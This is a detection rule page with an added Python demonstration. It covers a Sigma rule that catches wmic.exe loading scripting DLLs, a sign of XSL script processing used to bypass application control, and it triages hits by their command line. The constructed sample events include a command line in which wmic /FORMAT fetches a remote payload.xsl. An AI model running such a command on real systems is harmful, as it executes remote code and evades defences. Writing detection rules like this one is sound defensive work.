LoFP / the command wmic os get lastbootuptime loads vbscript.dll

Techniques

Sample rules

WMIC Loading Scripting Libraries

Description

Detects wmic.exe loading a scripting engine (jscript.dll or vbscript.dll). This happens when a threat actor uses the wmic /FORMAT switch to fetch and apply an XSL stylesheet that embeds JScript or VBScript (XSL script processing), which proxies code execution through a signed Windows binary and bypasses application control. The same image loads also occur during benign administration: wmic os get lastbootuptime, for example, loads vbscript.dll, so hits need to be triaged against the process command line rather than treated as confirmed malicious.

Detection logic

selection:
  Image|endswith: \wmic.exe
  ImageLoaded|endswith:
  - \jscript.dll
  - \vbscript.dll
condition: selection
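The following is an added example, not part of the original rule page: it runs the selection logic above over constructed Sysmon events and then joins each image-load hit (Event ID 7, which carries Image and ImageLoaded but no command line) to its process-creation event (Event ID 1) via ProcessGuid, so the /FORMAT case can be separated from the benign lastbootuptime false positive. The event records, GUIDs, paths and the example.invalid URL are all constructed sample data, and the triage step is an assumed analyst heuristic rather than something the Sigma rule itself defines.

```python
"""Evaluate the 'WMIC Loading Scripting Libraries' selection and triage its hits.

Constructed Sysmon-style events are embedded inline; nothing here is real telemetry.
"""
import re
from typing import Dict, List, Tuple

# Taken from the rule: the loading process and the scripting engines it watches for.
WMIC_IMAGE = "\\wmic.exe"
SCRIPT_ENGINES = ("\\jscript.dll", "\\vbscript.dll")

# Sigma's |endswith is case-insensitive, so everything is compared lower-cased.
WMIC_IMAGE = WMIC_IMAGE.lower()
SCRIPT_ENGINES = tuple(s.lower() for s in SCRIPT_ENGINES)

# wmic accepts both /FORMAT and -FORMAT; the switch is what drives XSL script processing.
FORMAT_SWITCH = re.compile(r"[/-]format", re.IGNORECASE)

WMIC_PATH = r"C:\Windows\System32\wbem\WMIC.exe"


def matches_rule(event: Dict[str, str]) -> bool:
    """Mirror the Sigma selection: Image ends with \\wmic.exe AND ImageLoaded ends with
    one of the scripting DLLs. Only image-load events (EventID 7) carry ImageLoaded."""
    if event.get("EventID") != "7":
        return False
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    return image.endswith(WMIC_IMAGE) and loaded.endswith(SCRIPT_ENGINES)


def triage(hit: Dict[str, str], process_creations: Dict[str, Dict[str, str]]) -> str:
    """Assumed triage heuristic (not part of the rule): look up the command line of the
    process that loaded the DLL and flag a /FORMAT switch as XSL script processing."""
    proc = process_creations.get(hit.get("ProcessGuid", ""))
    if proc is None:
        return "unknown: no matching process creation event"
    if FORMAT_SWITCH.search(proc.get("CommandLine", "")):
        return "suspicious: /FORMAT switch present (XSL script processing)"
    return "likely benign: no /FORMAT switch, review command line"


def run_rule(image_loads: List[Dict[str, str]],
             process_creations: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (ProcessGuid, verdict) for every image-load event the selection fires on."""
    return [(e["ProcessGuid"], triage(e, process_creations))
            for e in image_loads if matches_rule(e)]


# Constructed Event ID 1 (process creation) records, keyed by ProcessGuid.
PROCESS_CREATIONS: Dict[str, Dict[str, str]] = {
    "{guid-a}": {"EventID": "1", "ProcessGuid": "{guid-a}", "Image": WMIC_PATH,
                 "CommandLine": r'wmic os get /FORMAT:"http://example.invalid/payload.xsl"'},
    "{guid-b}": {"EventID": "1", "ProcessGuid": "{guid-b}", "Image": WMIC_PATH,
                 "CommandLine": "wmic os get lastbootuptime"},
    "{guid-c}": {"EventID": "1", "ProcessGuid": "{guid-c}", "Image": WMIC_PATH,
                 "CommandLine": "wmic process list brief"},
    "{guid-d}": {"EventID": "1", "ProcessGuid": "{guid-d}",
                 "Image": r"C:\Windows\System32\cscript.exe",
                 "CommandLine": "cscript login.vbs"},
}

# Constructed Event ID 7 (image load) records: one true positive, the known false
# positive from the rule's notes, and two events the selection must not match.
IMAGE_LOADS: List[Dict[str, str]] = [
    {"EventID": "7", "ProcessGuid": "{guid-a}", "Image": WMIC_PATH,
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    {"EventID": "7", "ProcessGuid": "{guid-b}", "Image": WMIC_PATH,
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    {"EventID": "7", "ProcessGuid": "{guid-c}", "Image": WMIC_PATH,
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    {"EventID": "7", "ProcessGuid": "{guid-d}",
     "Image": r"C:\Windows\System32\cscript.exe",
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
]

if __name__ == "__main__":
    for guid, verdict in run_rule(IMAGE_LOADS, PROCESS_CREATIONS):
        print(guid, PROCESS_CREATIONS[guid]["CommandLine"], "->", verdict)
```

The selection fires twice (the /FORMAT download and the benign uptime query) and ignores wmic loading wbemcomn.dll and cscript.exe loading vbscript.dll; only the ProcessGuid join to the command line tells the two hits apart, which is the enrichment a detection engineer should build into the alert rather than leave to manual lookup.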